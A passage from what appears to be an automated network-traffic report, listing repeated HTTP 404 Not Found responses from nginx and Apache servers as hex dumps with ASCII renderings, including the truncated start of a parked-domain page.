71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 30 39 31 32 31 30 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:36 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 00:39:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:39:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:12 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:15 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:17 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 00:40:20 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 